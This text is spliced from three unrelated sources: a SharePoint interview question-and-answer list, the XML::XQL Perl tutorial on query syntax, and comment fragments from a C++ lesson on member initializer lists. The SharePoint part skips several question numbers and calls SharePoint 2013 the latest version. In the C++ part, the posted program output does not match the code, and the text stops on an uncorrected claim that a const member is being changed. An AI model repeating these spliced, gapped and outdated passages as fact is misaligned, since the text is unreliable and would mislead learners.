SharePoint provides an extensible platform with a range of products that deliver business solutions to organizations with varying needs. SharePoint is useful for creating websites and helps bring important information together from different data sources. It also helps people communicate, network, and collaborate. So if you have finally found your dream job in SharePoint but are wondering how to crack the interview and what the probable 2020 SharePoint Interview Questions could be, keep in mind that every interview is different and the scope of every job is different too. With this in mind, we have designed the most common SharePoint Interview Questions and answers to help you succeed in your interview. Here are the top ten most asked 2020 SharePoint Interview Questions And Answers, divided into two parts as follows:
Part 1 – SharePoint Interview Questions And Answers (Basic)
This first part covers:
- SharePoint Sites is useful for creating websites.
- Insights acts as a tool that brings all information together from different data sources.
- SharePoint Communities helps in networking and collaborating with different people.
- Search helps in providing efficient and quick access to the information and contents of an enterprise.
- Contents acts as a full Content Management System.
- Lastly, Composites assists in using different tools and capabilities together.
2. What is the latest version of SharePoint and explain its main features in brief?
Answer: The latest version of SharePoint is SharePoint 2013. Its main features include improvements to areas that had performance issues in older versions, such as the Distributed Cache service, the Minimal Download Strategy, and Shredded Storage.
3. Explain the terms: Site template, Site definition, and ONET.xml.
Answer: The site template provides the basic template and layout of a new site to be created in SharePoint. The template contains design information about a site, including:
- Lists which are to be part of the site
- Site content like document libraries
- The themes and borders which are to be used on the site
- Web part pages which will be used on the site
In addition, it allows other SharePoint applications to be instantiated whenever required. The site definition is mainly a collection of XML and ASPX files whose elements are read by the SharePoint Handler object and loaded into the environment. A file generally contains an assembly name, namespace, public key token, type name, and safe declaration. Items that are not loaded into the environment properly will throw an error.
Part 2 – SharePoint Interview Questions And Answers (Advanced)
Let us now have a look at the advanced Interview Questions.
6. What are SPSite and SPWeb? Explain the difference between them.
Answer: SPSite represents a site collection in the object model. It is the object where we start working with the server object model, and it is frequently used in SharePoint application development. SPWeb, on the other hand, is a site under a site collection in SharePoint, represented by the SPWeb class in the object model.
8. What is GAC in SharePoint?
Answer: The Global Assembly Cache (GAC) holds assemblies, the compiled code used to run a program, and places custom binaries into the full-trust code group. The binaries are deployed to be used between the sender and the receiver. After signing, the binary carries a public key token identifying it, so that it can be used by the sender and receiver. The GAC can also be managed for .NET assemblies from the command line (for example, with the gacutil tool).
9. Explain the concept of Content-type in SharePoint.
Answer: Since SharePoint manages content, a content type is a reusable collection of settings and metadata that represents a particular kind of content. For example, an Employee content type may have a set of metadata like employee_id, employee_name, salary, etc. Content types help organize content in a more meaningful and organized way. They also support inheritance of all properties and appearances.
10. What is a Theme?
Answer: Themes are a tool to customize a site as per the user's needs. A theme applies lightweight branding by changing the overall site layout, colors, background, headers, etc. The latest version has an extensible theming engine with many new facilities, which makes customization easier. It provides for the creation of font schemes and color palettes. These user-specific themes can be added to the theme gallery and saved.
Recommended Article
This has been a guide to a list of SharePoint Interview Questions and Answers, so that candidates can crack these SharePoint interview questions easily. You may also look at the following articles to learn more –
https://www.educba.com/sharepoint-interview-questions/?source=leftnav
XML::XQL::Tutorial - Describes the XQL query syntax
This document describes the basic features of the XML Query Language (XQL). A proposal for the XML Query Language (XQL) specification was submitted to the XSL Working Group in September 1998. The spec can be found at. Since it is only a proposal at this point, things may change, but it is very likely that the final version will be close to the proposal. Most of this document was copied straight from the spec. See also the XML::XQL man page.
XQL (XML Query Language) provides a natural extension to the XSL pattern language. XQL is designed to be used in many contexts. Although it is a superset of XSL patterns, it is also applicable to providing links to nodes, for searching repositories, and for many other applications. Note that the term XQL is a working term for the language described in this proposal. It is not the authors' intent that this term be used permanently. Also, beware that another query language exists called XML-QL, which uses a syntax very similar to SQL.
The XML::XQL module has added functionality to the XQL spec, called XQL+. To allow only the XQL functionality described in the spec, use the XML::XQL::Strict module. Note that the XQL spec makes a distinction between core XQL and XQL extensions. This implementation makes no such distinction, and the Strict module therefore implements everything described in the XQL spec. See the XML::XQL man page for more information about the Strict module. This tutorial will clearly indicate when referring to XQL+.
This section describes the core XQL notation. These features should be part of every XQL implementation, and serve as the base level of functionality for its use in different technologies. The basic syntax for XQL mimics the URI directory navigation syntax, but instead of specifying navigation through a physical file structure, the navigation is through elements in the XML tree.
For example, the following URI means find the foo.jpg file within the bar directory: bar/foo.jpg Similarly, in XQL, the following means find the collection of fuz elements within baz elements: baz/fuz Throughout this document you will find numerous samples. They refer to the data shown in the sample file at the end of this man page. A context is the set of nodes against which a query operates. For the entire query, which is passed to the XML::XQL::Query constructor through the Expr option, the context is the list of input nodes that is passed to the query() method. XQL allows a query to select between using the current context as the input context and using the 'root context' as the input context. The 'root context' is a context containing only the root-most element of the document. When using XML::DOM, this is the Document object. By default, a query uses the current context. A query prefixed with '/' (forward slash) uses the root context. A query may optionally explicitly state that it is using the current context by using the './' (dot, forward slash) prefix. Both of these notations are analogous to the notations used to navigate directories in a file system. The './' prefix is only required in one situation. A query may use the '//' operator to indicate recursive descent. When this operator appears at the beginning of the query, the initial '/' causes the recursive descent to be performed relative to the root of the document or repository. The prefix './/' allows a query to perform a recursive descent relative to the current context. Find all author elements within the current context.
Since the period is really not used alone, this example forward-references other features: ./author Note that this is equivalent to: author Find the root element (bookstore) of this document: /bookstore Find all author elements anywhere within the current document: //author Find all books where the value of the style attribute on the book is equal to the value of the specialty attribute of the bookstore element at the root of the document: book[/bookstore/@specialty = @style] The collection returned by an XQL expression preserves document order, hierarchy, and identity, to the extent that these are defined. That is, a collection of elements will always be returned in document order without repeats. Note that the spec states that the order of attributes within an element is undefined, but that this implementation does keep attributes in document order. See the XML::XQL man page for more details regarding Document Order. The collection of all elements with a certain tag name is expressed using the tag name itself. This can be qualified by showing that the elements are selected from the current context './', but the current context is assumed and often need not be noted explicitly. Find all first-name elements. These examples are equivalent: ./first-name first-name Find all unqualified book elements: book Find all first.name elements: The collection of elements of a certain type can be determined using the path operators ('/' or '//'). These operators take as their arguments a collection (left side) from which to query elements, and a collection indicating which elements to select (right side). The child operator ('/')selects from immediate children of the left-side collection, while the descendant operator ('//') selects from arbitrary descendants of the left-side collection. In effect, the '//' can be thought of as a substitute for one or more levels of hierarchy. Note that the path operators change the context as the query is performed. 
By stringing them together users can 'drill down' into the document. Find all first-name elements within an author element. Note that the author children of the current context are found, and then first-name children are found relative to the context of the author elements: author/first-name Find all title elements, one or more levels deep in the bookstore (arbitrary descendants): bookstore//title Note that this is different from the following query, which finds all title elements that are grandchildren of bookstore elements: bookstore/*/title Find emph elements anywhere inside book excerpts, anywhere inside the bookstore: bookstore//book/excerpt//emph Find all titles, one or more levels deep in the current context. Note that this situation is essentially the only one where the period notation is required: .//title An element can be referenced without using its name by substituting the '*' collection. The '*' collection returns all elements that are children of the current context, regardless of their tag name. Find all element children of author elements: author/* Find all last-names that are grand-children of books: book/*/last-name Find the grandchildren elements of the current context: */* Find all elements with specialty attributes. Note that this example uses subqueries, which are covered in Filters, and attributes, which are discussed in Finding an attribute: *[@specialty] Attribute names are preceded by the '@' symbol. XQL is designed to treat attributes and sub-elements impartially, and capabilities are equivalent between the two types wherever possible. Note: attributes cannot contain subelements. Thus, attributes cannot have path operators applied to them in a query. Such expressions will result in a syntax error. The XQL spec states that attributes are inherently unordered and indices cannot be applied to them, but this implementation allows it. 
Find the style attribute of the current element context: @style Find the exchange attribute on price elements within the current context: price/@exchange The following example is not valid: price/@exchange/total Find all books with style attributes. Note that this example uses subqueries, which are covered in Filters: book[@style] Find the style attribute for all book elements: book/@style XQL query expressions may contain literal values (i.e. constants.) Numbers (integers and floats) are wrapped in XML::XQL::Number objects and strings in XML::XQL::Text objects. Booleans (as returned by true() and false()) are wrapped in XML::XQL::Boolean objects. Strings must be enclosed in single or double quotes. Since XQL does not allow escaping of special characters, it's impossible to create a string with both a single and a double quote in it. To remedy this, XQL+ has added the q// and qq// string delimiters which behave just like they do in Perl. For Numbers, exponential notation is not allowed. Use the XQL+ function eval() to circumvent this problem. See XML::XQL man page for details. The empty list or undef is represented by [] (i.e. reference to empty array) in this implementation. Integer Numbers: 234 -456 Floating point Numbers: 1.23 -0.99 Strings: "some text with 'single' quotes" 'text with "double" quotes' Not allowed: 1.23E-4 (use eval("1.23E-4", "Number") in XQL+) "can't use \"double \"quotes" (use q/can't use "double" quotes/ in XQL+) Parentheses can be used to group collection operators for clarity or where the normal precedence is inadequate to express an operation. Constraints and branching can be applied to any collection by adding a filter clause '[ ]' to the collection. The filter is analogous to the SQL WHERE clause with ANY semantics. The filter contains a query within it, called the subquery. The subquery evaluates to a Boolean, and is tested for each element in the collection. 
Any elements in the collection failing the subquery test are omitted from the result collection. For convenience, if a collection is placed within the filter, a Boolean TRUE is generated if the collection contains any members, and a FALSE is generated if the collection is empty. In essence, an expression such as author/degree implies a collection-to-Boolean conversion function like the following mythical 'there-exists-a' method. author[.there-exists-a(degree)] Note that any number of filters can appear at a given level of an expression. Empty filters are not allowed. Find all books that contain at least one excerpt element: book[excerpt] Find all titles of books that contain at least one excerpt element: book[excerpt]/title Find all authors of books where the book contains at least one excerpt, and the author has at least one degree: book[excerpt]/author[degree] Find all books that have authors with at least one degree: book[author/degree] Find all books that have an excerpt and a title: book[excerpt][title] Users can explicitly indicate whether to use any or all semantics through the $any$ and $all$ keywords. $any$ flags that a condition will hold true if any item in a set meets that condition. $all$ means that all elements in a set must meet the condition for the condition to hold true. $any$ and $all$ are keywords that appear before a subquery expression within a filter. Find all author elements where one of the last names is Bob: author[last-name = 'Bob'] author[$any$ last-name = 'Bob'] Find all author elements where none of the last-name elements are Bob: author[$all$ last-name != 'Bob'] Find all author elements where the first last name is Bob: author[last-name[0] = 'Bob'] XQL makes it easy to find a specific node within a set of nodes. Simply enclose the index ordinal within square brackets. The ordinal is 0 based. A range of elements can be returned. 
To do so, specify an expression rather than a single value inside of the subscript operator (square brackets). Such expressions can be a comma-separated list of any of the following:
- n : Returns the nth element
- -n : Returns the element that is n-1 units from the last element. E.g., -1 means the last element; -2 is the next-to-last element.
- m $to$ n : Returns elements m through n, inclusive
Find the first author element: author[0] Find the third author element that has a first-name: author[first-name][2] Note that indices are relative to the parent. In other words, consider the following data:
<x>
  <y/>
  <y/>
</x>
<x>
  <y/>
  <y/>
</x>
The following expression will return the first y from each of the x's: x/y[0] The following will return the first y from the entire set of y's within x's: (x/y)[0] The following will return the first y from the first x: x[0]/y[0] Find the first and fourth author elements: author[0,3] Find the first through fourth author elements: author[0 $to$ 3] Find the first, the third through fifth, and the last author elements: author[0, 2 $to$ 4, -1] Find the last author element: author[-1] Boolean expressions can be used within subqueries. For example, one could use Boolean expressions to find all nodes of a particular value, or all nodes with values in particular ranges. Boolean expressions are of the form ${op}$, where {op} may be any expression of the form {b|a} - that is, the operator takes lvalue and rvalue arguments and returns a Boolean result. Note that the XQL Extensions section defines additional Boolean operations. $and$ and $or$ are used to perform Boolean ands and ors. The Boolean operators, in conjunction with grouping parentheses, can be used to build very sophisticated logical expressions. Note that spaces are not significant and can be omitted, or included for clarity as shown here. Find all author elements that contain at least one degree and one award.
    author[degree $and$ award]

Find all author elements that contain at least one degree or award and at least one publication:

    author[(degree $or$ award) $and$ publication]

$not$ is a Boolean operator that negates the value of an expression within a subquery.

Find all author elements that contain at least one degree element and that contain no publication elements:

    author[degree $and$ $not$ publication]

Find all author elements that contain publications elements but do not contain either degree elements or award elements:

    author[$not$ (degree $or$ award) $and$ publication]

The $union$ operator (shortcut is '|') returns the combined set of values from the query on the left and the query on the right. Duplicates are filtered out. The resulting list is sorted in document order. Note: because this is a union, the set returned may include 0 or more elements of each element type in the list. To restrict the returned set to nodes that contain at least one of each of the elements in the list, use a filter, as discussed in Filters. The $intersect$ operator returns the set of elements in common between two sets.

Find all first-names and last-names:

    first-name $union$ last-name

Find all books and magazines from a bookstore:

    bookstore/(book | magazine)

Find all books and all authors:

    book $union$ book/author

Find the first-names, last-names, or degrees from authors within either books or magazines:

    (book $union$ magazine)/author/(first-name $union$ last-name $union$ degree)

Find all books with author/first-name equal to 'Bob' and all magazines with price less than 10:

    book[author/first-name = 'Bob'] $union$ magazine[price $lt$ 10]

The '=' sign is used for equality; '!=' for inequality. Alternatively, $eq$ and $ne$ can be used for equality and inequality. Single or double quotes can be used for string delimiters in expressions. This makes it easier to construct and pass XQL from within scripting languages. For comparing values of elements, the value() method is implied.
That is, last-name < 'foo' really means last-name!value() < 'foo'.

Note that filters are always with respect to a context. That is, the expression book[author] means: for every book element that is found, see if it has an author subelement. Likewise, book[author = 'Bob'] means: for every book element that is found, see if it has a subelement named author whose value is 'Bob'. One can examine the value of the context as well, by using the . (period). For example, book[. = 'Trenton'] means: for every book that is found, see if its value is 'Trenton'.

Find all author elements whose last name is Bob:

    author[last-name = 'Bob']
    author[last-name $eq$ 'Bob']

Find all authors where the from attribute is not equal to 'Harvard':

    degree[@from != 'Harvard']
    degree[@from $ne$ 'Harvard']

Find all authors where the last-name is the same as the /guest/last-name element:

    author[last-name = /guest/last-name]

Find all authors whose text is 'Matthew Bob':

    author[. = 'Matthew Bob']
    author = 'Matthew Bob'

A set of binary comparison operators is available for comparing numbers and strings and returning Boolean results. $lt$, $le$, $gt$, $ge$ are used for less than, less than or equal, greater than, and greater than or equal. These same operators are also available in a case-insensitive form: $ieq$, $ine$, $ilt$, $ile$, $igt$, $ige$. <, <=, > and >= are allowed shortcuts for $lt$, $le$, $gt$ and $ge$.

Find all author elements whose last name is Bob and whose price is greater than 50:

    author[last-name = 'Bob' $and$ price $gt$ 50]

Find all authors where the from attribute is not equal to 'Harvard':

    degree[@from != 'Harvard']

Find all authors whose last name begins with 'M' or greater:

    author[last-name $ge$ 'M']

Find all authors whose last name begins with 'M', 'm' or greater:

    author[last-name $ige$ 'M']

Find the first three books:

    book[index() $le$ 2]

Find all authors who have more than 10 publications:

    author[publications!count() $gt$ 10]

XQL+ defines additional operators for pattern matching.
The $match$ operator (shortcut is '=~') returns TRUE if the lvalue matches the pattern described by the rvalue. The $no_match$ operator (shortcut is '!~') returns FALSE if they match. Both lvalue and rvalue are first cast to strings. The rvalue string should have the syntax of a Perl rvalue; that is, the delimiters should be included and modifiers are allowed. When using delimiters other than slashes '/', the 'm' should be included. The rvalue should be a string, so don't forget the quotes! (Or use the q// or qq// delimiters in XQL+; see the XML::XQL man page.) Note that you can't use the Perl substitution operator s/// here. Try using the XQL+ subst() function instead.

Find all authors whose name contains bob or Bob:

    author[first-name =~ '/[Bb]ob/']

Find all book titles that don't contain 'Trenton' (case-insensitive):

    book[title !~ 'm!trenton!i']

See the XML::XQL man page for other operators available in XQL+.

The lvalue of a comparison can be a vector or a scalar. The rvalue of a comparison must be a scalar or a value that can be cast at runtime to a scalar. If the lvalue of a comparison is a set, then any (exists) semantics are used for the comparison operators. That is, the result of a comparison is true if any item in the set meets the condition. The spec states that the lvalue of an expression cannot be a literal. That is, '1' = a is not allowed. This implementation allows it, but it's not clear how useful that is.

Elements, attributes and other XML node types are cast to strings (Text) by applying the value() method. The value() method calls the text() method by default, but this behavior can be altered by the user, so the value() method may return other XQL data types. When two values are compared, they are first cast to the same type. See the XML::XQL man page for details on casting. Note that the XQL spec is not very clear on how values should be cast for comparison.
Discussions with the authors of the XQL spec revealed that there was some disagreement and their implementations differed on this point. This implementation is closest to that of Joe Lapp from webMethods, Inc.

XQL makes a distinction between functions and methods. See the XML::XQL man page for details. XQL provides methods for advanced manipulation of collections. These methods provide specialized collections of nodes (see Collection methods), as well as information about sets and nodes. Methods are of the form:

    method(arglist)

Consider the query book[author]. It will find all books that have authors. Formally, we call the book corresponding to a particular author the reference node for that author. That is, every author element that is examined is an author for one of the book elements. (See the Annotated XQL BNF Appendix for a much more thorough definition of reference node and other terms. See also the XML::XQL man page.) Methods always apply to the reference node. For example, the text() method returns the text contained within a node, minus any structure. (That is, it is the concatenation of all text nodes contained within an element and its descendants.)

The following expression will return all authors named 'Bob':

    author[text() = 'Bob']

The following will return all authors containing a first-name child whose text is 'Bob':

    author[first-name!text() = 'Bob']

The following will return all authors containing a child named Bob:

    author[*!text() = 'Bob']

Method names are case sensitive. See the XML::XQL man page on how to define your own methods and functions.

The following methods provide information about nodes in a collection. These methods return strings or numbers, and may be used in conjunction with comparison operators within subqueries.

The text() method concatenates text of the descendants of a node, normalizing white space along the way.
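As an illustrative aside (this is not the XML::XQL implementation, which is Perl), the effect of text() and rawText() can be sketched with Python's standard library: concatenate all descendant text, then collapse runs of white space.

```python
import xml.etree.ElementTree as ET

def text(el):
    """Concatenate all descendant text of el, then normalize white space."""
    raw = "".join(el.itertext())   # like rawText(): descendant text, unnormalized
    return " ".join(raw.split())   # like text(): collapse white-space runs

author = ET.fromstring(
    "<author>\n"
    "  <first-name>Matthew</first-name>\n"
    "  <last-name>Bob</last-name>\n"
    "</author>")

print(text(author))  # Matthew Bob
```

With this helper, a filter such as author[text() = 'Matthew Bob'] corresponds to checking `text(author) == 'Matthew Bob'`. (The xml:space='preserve' handling described below is not modeled in this sketch.)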
White space will be preserved for a node if the node has the xml:space attribute set to 'preserve', or if the nearest ancestor with the xml:space attribute has the attribute set to 'preserve'. When white space is normalized, it is normalized across the entire string. Spaces are used to separate the text between nodes. When entity references are used in a document, spacing is not inserted around the entity refs when they are expanded. In this implementation, the method may receive an optional parameter to indicate whether the text() of Element nodes should include the text() of its Element descendants. See the XML::XQL man page for details.

Examples. Find the authors whose last name is 'Bob':

    author[last-name!text() = 'Bob']

Note this is equivalent to:

    author[last-name = 'Bob']

Find the authors with value 'Matthew Bob':

    author[text() = 'Matthew Bob']
    author[. = 'Matthew Bob']
    author = 'Matthew Bob'

The rawText() method is similar to the text() method, but it does not normalize whitespace. In this implementation, the method may receive an optional parameter to indicate whether the rawText() of Element nodes should include the rawText() of its Element descendants. See the XML::XQL man page for details.

The value() method returns a type-cast version of the value of a node. If no data type is provided, it returns the same as text(). For the purposes of comparison, value() is implied if omitted. In other words, when two items are compared, the comparison is between the value of the two items. Remember that in absence of type information, value() returns text(). The following examples are equivalent:

    author[last-name!value() = 'Bob' $and$ first-name!value() = 'Joe']
    author[last-name = 'Bob' $and$ first-name = 'Joe']

    price[@intl!value() = 'canada']
    price[@intl = 'canada']

The nodeType() method returns a number to indicate the type of the node. The values were based on the node type values in the DOM:

    element        1
    attribute      2
    text           3
    entity         6   (not in XQL spec)
    PI             7
    comment        8
    document       9
    doc. fragment 10   (not in XQL spec)
    notation      11   (not in XQL spec)

Note that in XQL, CDATASection nodes and EntityReference nodes also return 3, whereas in the DOM CDATASection returns 4 and EntityReference returns 5. Use the XQL+ method DOM_nodeType() to get DOM node type values. See the XML::DOM man page for node type values of nodes not mentioned here.

The nodeTypeString() method returns the name of the node type in lowercase, or an empty string. The following node types are currently supported: 1 (element), 2 (attribute), 3 (text), 7 (processing_instruction), 8 (comment), 9 (document).

The nodeName() method returns the tag name for Element nodes and the attribute name for attributes.

The index() method returns the index of the value within the search context (i.e. within the input list of the subquery). This is not necessarily the same as the index of a node within its parent node. Note that the XQL spec doesn't explain it well.

Find the first 3 degrees:

    degree[index() $lt$ 3]

Note that it skips over other nodes that may exist between the degree elements. Consider the following data:

    <x> <y/> <y/> </x>
    <x> <y/> <y/> </x>

The following expression will return the first y from each x:

    x/y[index() = 0]

This could also be accomplished by (see Indexing into a Collection):

    x/y[0]

The end() method returns true for the last element in the search context. Again, the XQL spec does not explain it well.

Find the last book:

    book[end()]

Find the last author for each book:

    book/author[end()]

Find the last author from the entire set of authors of books:

    (book/author)[end()]

The count() method returns the number of values inside the search context. In XQL+, when the optional QUERY parameter is supplied, it returns the number of values returned by the QUERY.

The following methods can be applied to a node to return namespace information.

Returns the local name portion of the node, excluding the prefix. Local names are defined only for element nodes and attribute nodes. The local name of an element node is the local portion of the node's element type name.
The local name of an attribute node is the local portion of the node's attribute name. If a local name is not defined for the reference node, the method evaluates to the empty set.

Returns the URI for the namespace of the node. Namespace URIs are defined only for element nodes and attribute nodes. The namespace URI of an element node is the namespace URI associated with the node's element type name. The namespace URI of an attribute node is the namespace URI associated with the node's attribute name. If a namespace URI is not defined for the reference node, the method evaluates to the empty set.

Returns the prefix for the node. Namespace prefixes are defined only for element nodes and attribute nodes. The namespace prefix of an element node is the shortname for the namespace of the node's element type name. The namespace prefix of an attribute node is the shortname for the namespace of the node's attribute name. If a namespace prefix is not defined for the reference node, the method evaluates to the empty set.

The spec states:

    A node's namespace prefix may be defined within the query expression,
    within the document under query, or within both the query expression and
    the document under query. If it is defined in both places the prefixes
    may not agree. In this case, the prefix assigned by the query expression
    takes precedence.

In this implementation you cannot define the namespace for a query, so this can never happen.

Find all unqualified book elements. Note that this does not return my:book elements:

    book

Find all book elements with the prefix 'my'.
Note that this query does not return unqualified book elements:

    my:book

Find all book elements with a 'my' prefix that have an author subelement:

    my:book[author]

Find all book elements with a 'my' prefix that have an author subelement with a my prefix:

    my:book[my:author]

Find all elements with a prefix of 'my':

    my:*

Find all book elements from any namespace:

    *:book

Find any element from any namespace:

    *

Find the style attribute with a 'my' prefix within a book element:

    book/@my:style

All attributes of an element can be returned using @*. This is potentially useful for applications that treat attributes as fields in a record.

Find all attributes of the current element context:

    @*

Find style attributes from any namespace:

    @*:style

Find all attributes from the 'my' namespace, including unqualified attributes on elements from the 'my' namespace:

    @my:*

This section defines the functions of XQL. The spec states that:

    XQL defines two kinds of functions: collection functions and pure
    functions. Collection functions use the search context of the Invocation
    instance, while pure functions ignore the search context, except to
    evaluate the function's parameters. A collection function evaluates to a
    subset of the search context, and a pure function evaluates to either a
    constant value or to a value that depends only on the function's
    parameters.

Don't worry if you don't get it. Just use them!

The collection functions provide access to the various types of nodes in a document. Any of these collections can be constrained and indexed. The collections return the set of children of the reference node meeting the particular restriction:

    textNode()    The collection of text nodes.
    comment()     The collection of comment nodes.
    pi()          The collection of processing instruction nodes.
    element()     The collection of all element nodes. If the optional text
                  parameter is provided, it only returns element children
                  matching that particular name.
    attribute()   The collection of all attribute nodes. If the optional text
                  parameter is provided, it only returns attributes matching
                  that particular name.
    node()        The collection of all non-attribute nodes.

Find the second text node in each p element in the current context:

    p/textNode()[1]

Find the second comment anywhere in the document. See Context for details on setting the context to the document root:

    //comment()[1]

ancestor() finds the nearest ancestor matching the provided query. It returns either a single element result or an empty set []. Note that this node is never the reference node itself.

Find the nearest book ancestor of the current element:

    ancestor(book)

Find the nearest ancestor author element that is contained in a book element:

    ancestor(book/author)

id() is a pure function that evaluates to a set. The set contains an element node that has an 'id' attribute whose value is identical to the string that the Text parameter quotes. The element node may appear anywhere within the document under query. If more than one element node meets these criteria, the function evaluates to a set that contains the first node appearing in a document ordering of the nodes.

true() and false() are pure functions that each evaluate to a Boolean. "true()" evaluates to 'true', and "false()" evaluates to 'false'. These functions are useful in expressions that are constructed using entity references or variable substitution, since they may replace an expression found in an instance of Subquery without violating the syntax required by the instance of Subquery. They return an object of type XML::XQL::Boolean.

"date" is a pure function that typecasts the value of its parameter to a set of dates. If the parameter matches a single string, the value of the function is a set containing a single date. If the parameter matches a QUERY, the value of the function is a set of dates, where the set contains one date for each member of the set to which the parameter evaluates.
XQL does not define the representation of the date value, nor does it define how the function translates parameter values into dates. This implementation uses the Date::Manip module to parse dates, which accepts almost any imaginable format. See XML::XQL to plug in your own Date implementation. Include the XML::XQL::Date package to add the XQL date type and the date() function, like this:

    use XML::XQL::Date;

XQL+ provides XQL function wrappers for most Perl builtin functions. It also provides other cool functions like subst(), map(), and eval() that allow you to modify documents and embed Perl code. If this is still not enough, you can add your own functions and methods. See the XML::XQL man page for details.

The whitepaper 'The Design of XQL' by Jonathan Robie describes the sequence operators ';;' (precedes) and ';' (immediately precedes). Although these operators are not included in the XQL spec, I thought I'd add them anyway.

With the following input:

    <TABLE>
      <ROWS>
        <TR>
          <TD>Shady Grove</TD>
          <TD>Aeolian</TD>
        </TR>
        <TR>
          <TD>Over the River, Charlie</TD>
          <TD>Dorian</TD>
        </TR>
      </ROWS>
    </TABLE>

Find the TD node that contains "Shady Grove" and the TD node that immediately follows it:

    //(TD="Shady Grove" ; TD)

Note that in XML::DOM there is actually a text node with whitespace between the two TD nodes, but those are ignored by this operator, unless the text node has 'xml:space' set to 'preserve'. See ??? for details.
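XML::XQL implements ';' in Perl; purely as an illustration of the "immediately precedes" semantics (and not the real implementation), here is a rough Python sketch that collects, for the TABLE input above, the TD that immediately follows the matching TD. Element-only sibling scanning stands in for the operator's skipping of ignorable whitespace text nodes.

```python
import xml.etree.ElementTree as ET

doc = ET.fromstring(
    "<TABLE><ROWS>"
    "<TR><TD>Shady Grove</TD><TD>Aeolian</TD></TR>"
    "<TR><TD>Over the River, Charlie</TD><TD>Dorian</TD></TR>"
    "</ROWS></TABLE>")

def immediately_preceded_by(root, tag, text):
    """Yield elements with the given tag whose previous element sibling
    has the same tag and the given text (a sketch of  TAG=text ; TAG )."""
    for parent in root.iter():
        kids = list(parent)
        for prev, cur in zip(kids, kids[1:]):
            if prev.tag == tag and prev.text == text and cur.tag == tag:
                yield cur

matches = list(immediately_preceded_by(doc, "TD", "Shady Grove"))
print([m.text for m in matches])  # ['Aeolian']
```

Note that the XQL query `//(TD="Shady Grove" ; TD)` returns both TD nodes; this sketch only collects the follower, to keep the sibling-adjacency logic in focus.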
With the following input (from Hamlet):

    <SPEECH>
      <SPEAKER>MARCELLUS</SPEAKER>
      <LINE>Tis gone!</LINE>
      <STAGEDIR>Exit Ghost</STAGEDIR>
      <LINE>We do it wrong, being so majestical,</LINE>
      <LINE>To offer it the show of violence;</LINE>
      <LINE>For it is, as the air, invulnerable,</LINE>
      <LINE>And our vain blows malicious mockery.</LINE>
    </SPEECH>

Return the STAGEDIR and all the LINEs that follow it:

    SPEECH//( STAGEDIR ;; LINE )

Suppose an actor playing the ghost wants to know when to exit; that is, he wants to know who says what line just before he is supposed to exit. The line immediately precedes the stagedir, but the speaker may occur at any time before the line. In this query, we will use the "precedes" operator (";;") to identify a speaker that precedes the line somewhere within a speech. Our ghost can find the required information with the following query, which selects the speaker, the line, and the stagedir:

    SPEECH//( SPEAKER ;; LINE ; STAGEDIR="Exit Ghost")

The following table lists operators in precedence order, highest precedence first, where operators of a given row have the same precedence. The table also lists the associated productions:

    Production    Operator(s)
    ----------    -----------
    Grouping      ( )
    Filter        [ ]
    Subscript     [ ]
    Bang          !
    Path          / //
    Match         $match$ $no_match$ =~ !~   (XQL+ only)
    Comparison    = != < <= > >= $eq$ $ne$ $lt$ $le$ $gt$ $ge$
                  $ieq$ $ine$ $ilt$ $ile$ $igt$ $ige$
    Intersection  $intersect$
    Union         $union$ |
    Negation      $not$
    Conjunction   $and$
    Disjunction   $or$
    Sequence      ; ;;

This file is also stored in samples/bookstore.xml that comes with the XML::XQL distribution.
    <?xml version='1.0'?>
    <!-- This file represents a fragment of a book store inventory database -->
    <bookstore specialty='novel'>
      <book style='autobiography'>
        <title>Seven Years in Trenton</title>
        <author>
          <first-name>Joe</first-name>
          <last-name>Bob</last-name>
          <award>Trenton Literary Review Honorable Mention</award>
        </author>
        <price>12</price>
      </book>
      <book style='textbook'>
        <title>History of Trenton</title>
        <author>
          <first-name>Mary</first-name>
          <last-name>Bob</last-name>
          <publication>
            Selected Short Stories of
            <first-name>Mary</first-name>
            <last-name>Bob</last-name>
          </publication>
        </author>
        <price>55</price>
      </book>
      <magazine style='glossy' frequency='monthly'>
        <title>Tracking Trenton</title>
        <price>2.50</price>
        <subscription price='24' per='year'/>
      </magazine>
      <book style='novel' id='myfave'>
        <title>Trenton Today, Trenton Tomorrow</title>
        <author>
          <first-name>Toni</first-name>
          <last-name>Bob</last-name>
          <degree from='Trenton U'>B.A.</degree>
          <degree from='Harvard'>Ph.D.</degree>
          <award>Pulizer</award>
        </author>
      </book>
      <my:book ...>
        <my:title>Who's Who in Trenton</my:title>
        <my:author>Robert Bob</my:author>
      </my:book>
    </bookstore>

The Japanese version of this document can be found on-line. See also: XML::XQL, XML::XQL::Date, XML::XQL::Query and XML::XQL::DOM.
Member initializer lists work both with fundamental types and members that are classes themselves.

Quiz Time

1) Write a class named RGBA that contains 4 member variables of type std::uint8_t named m_red, m_green, m_blue, and m_alpha (#include cstdint to access type std::uint8_t). Assign default values of 0 to m_red, m_green, and m_blue, and 255 to m_alpha. Create a constructor that uses a member initializer list that allows the user to initialize values for m_red, m_blue, m_green, and m_alpha.

Just curious, I got almost everything correct except for the part where printing requires "static_cast<int>(color)". May I ask what is static_cast<int>?

Hi Travis! static_cast converts a value of type A to a value of type B. Casting is covered in lesson 4.4a (Explicit type conversion (casting)). I suggest you also read Alex's comment in the same lesson about reinterpret_cast and dynamic_cast.

    #include <iostream>
    #include <cstdint>
    using namespace std;

    class RGBA
    {
        uint8_t m_R;
        uint8_t m_G;
        uint8_t m_B;
        uint8_t m_A;

    public:
        RGBA(uint8_t R = { 0 }, uint8_t G = {}, uint8_t B = {}, uint8_t A = { 255 })
            : m_R(R), m_G(G), m_B(B), m_A(A)
        {
        }

        void print()
        {
            cout << " R: " << static_cast<int>(m_R)
                 << " G: " << static_cast<int>(m_G)
                 << " B: " << static_cast<int>(m_B)
                 << " A: " << static_cast<int>(m_A) << endl;
        }
    };

    int main()
    {
        RGBA foo(2, 3);
        foo.print();
        return 0;
    }

Output:

    C:\Users\Amy\CLionProjects\Concurrency\untitled24\cmake-build-debug\untitled24.exe
    Hello, World!
    R: 2 G: 3 B: 0 A: 255
    R: 2 G: 3 B: 0 A: 255
    Process finished with exit code 0

Note the "= {}" is needed. I thought Green == 2 and Blue == 4 <compiler issue maybe>. Same behavior on C:\Program Files\mingw-w64\x86_64-7.2.0-win32-seh-rt_v5-rev1\mingw64 and on C:\cygwin64 v2.10.0.

    #include <iostream>
    using namespace std;

    class abc
    {
    public:
        const int a = 8;

        abc() : a(45)
        {
        }
    };

By writing this code we are changing the constant variable. It means we can re-initialize the constant member using the initializer list.
> By writing this code we are changing the constant variable.

